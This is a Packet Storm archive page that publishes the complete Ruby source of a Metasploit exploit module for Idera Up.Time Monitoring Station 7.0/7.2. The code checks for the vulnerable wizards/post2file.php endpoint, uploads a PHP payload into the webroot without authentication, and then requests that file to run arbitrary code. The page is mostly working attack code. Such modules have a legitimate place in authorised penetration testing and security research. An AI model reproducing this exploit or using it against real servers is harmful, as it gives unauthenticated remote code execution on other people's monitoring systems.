what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

Idera Up.Time Monitoring Station 7.0 post2file.php Arbitrary File Upload Version 1

Idera Up.Time Monitoring Station 7.0 post2file.php Arbitrary File Upload Version 1
Posted Nov 13, 2015
Authored by Denis Andzakovic | Site metasploit.com

This Metasploit module exploits an arbitrary file upload vulnerability found within the Up.Time monitoring server 7.2 and below. A malicious entity can upload a PHP file into the webroot without authentication, leading to arbitrary code execution. Although the vendor fixed Up.Time to prevent this vulnerability, it was not properly mitigated. To exploit against a newer version of Up.Time (such as 7.4), please use exploits/multi/http/uptime_file_upload_2.

tags | exploit, web, arbitrary, php, code execution, file upload
SHA-256 | 3a747350c98cce69fa71e25b346c4de32b1a03a8ca5d876cf4c6dd0be8365fbc

Idera Up.Time Monitoring Station 7.0 post2file.php Arbitrary File Upload Version 1

Change Mirror Download
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##


require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
Rank = ExcellentRanking

include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::PhpEXE

def initialize(info = {})
super(update_info(info,
'Name' => 'Idera Up.Time Monitoring Station 7.0 post2file.php Arbitrary File Upload',
'Description' => %q{
This module exploits an arbitrary file upload vulnerability found within the Up.Time
monitoring server 7.2 and below. A malicious entity can upload a PHP file into the
webroot without authentication, leading to arbitrary code execution.

Although the vendor fixed Up.Time to prevent this vulnerability, it was not properly
mitigated. To exploit against a newer version of Up.Time (such as 7.4), please use
exploits/multi/http/uptime_file_upload_2.
},
'Author' =>
[
'Denis Andzakovic <denis.andzakovic[at]security-assessment.com>' # Vulnerability discoverey and MSF module
],
'License' => MSF_LICENSE,
'References' =>
[
[ 'OSVDB', '100423' ],
[ 'BID', '64031'],
[ 'URL', 'https://www.security-assessment.com/files/documents/advisory/Up.Time%207.2%20-%20Arbitrary%20File%20Upload.pdf' ]
],
'Payload' =>
{
'Space' => 10000, # just a big enough number to fit any PHP payload
'DisableNops' => true
},
'Platform' => 'php',
'Arch' => ARCH_PHP,
'Targets' =>
[
[ 'Up.Time 7.0/7.2', { } ],
],
'DefaultTarget' => 0,
'DisclosureDate' => 'Nov 19 2013'))

register_options([
OptString.new('TARGETURI', [true, 'The full URI path to the Up.Time instance', '/']),
Opt::RPORT(9999)
], self.class)
end

def check
uri = target_uri.path

res = send_request_cgi({
'method' => 'POST',
'uri' => normalize_uri(uri, 'wizards', 'post2file.php')
})

if res and res.code == 500 and res.body.to_s =~ /<title><\/title>/
return Exploit::CheckCode::Appears
end

return Exploit::CheckCode::Safe

end

def exploit
print_status("#{peer} - Uploading PHP to Up.Time server")
uri = target_uri.path

@payload_name = "#{rand_text_alpha(5)}.php"
php_payload = get_write_exec_payload(:unlink_self => true)

post_data = ({
"file_name" => @payload_name,
"script" => php_payload
})

print_status("#{peer} - Uploading payload #{@payload_name}")
res = send_request_cgi({
'method' => 'POST',
'uri' => normalize_uri(uri, 'wizards', 'post2file.php'),
'vars_post' => post_data,
})

unless res and res.code == 200 and res.body.to_s =~ /<title><\/title>/
fail_with(Failure::UnexpectedReply, "#{peer} - Upload failed")
end

print_status("#{peer} - Executing payload #{@payload_name}")
res = send_request_cgi({
'uri' => normalize_uri(uri, 'wizards', @payload_name),
'method' => 'GET'
})
end
end
Login or Register to add favorites

File Archive:

November 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Nov 1st
    30 Files
  • 2
    Nov 2nd
    0 Files
  • 3
    Nov 3rd
    0 Files
  • 4
    Nov 4th
    12 Files
  • 5
    Nov 5th
    44 Files
  • 6
    Nov 6th
    18 Files
  • 7
    Nov 7th
    9 Files
  • 8
    Nov 8th
    8 Files
  • 9
    Nov 9th
    3 Files
  • 10
    Nov 10th
    0 Files
  • 11
    Nov 11th
    14 Files
  • 12
    Nov 12th
    20 Files
  • 13
    Nov 13th
    63 Files
  • 14
    Nov 14th
    18 Files
  • 15
    Nov 15th
    0 Files
  • 16
    Nov 16th
    0 Files
  • 17
    Nov 17th
    0 Files
  • 18
    Nov 18th
    0 Files
  • 19
    Nov 19th
    0 Files
  • 20
    Nov 20th
    0 Files
  • 21
    Nov 21st
    0 Files
  • 22
    Nov 22nd
    0 Files
  • 23
    Nov 23rd
    0 Files
  • 24
    Nov 24th
    0 Files
  • 25
    Nov 25th
    0 Files
  • 26
    Nov 26th
    0 Files
  • 27
    Nov 27th
    0 Files
  • 28
    Nov 28th
    0 Files
  • 29
    Nov 29th
    0 Files
  • 30
    Nov 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close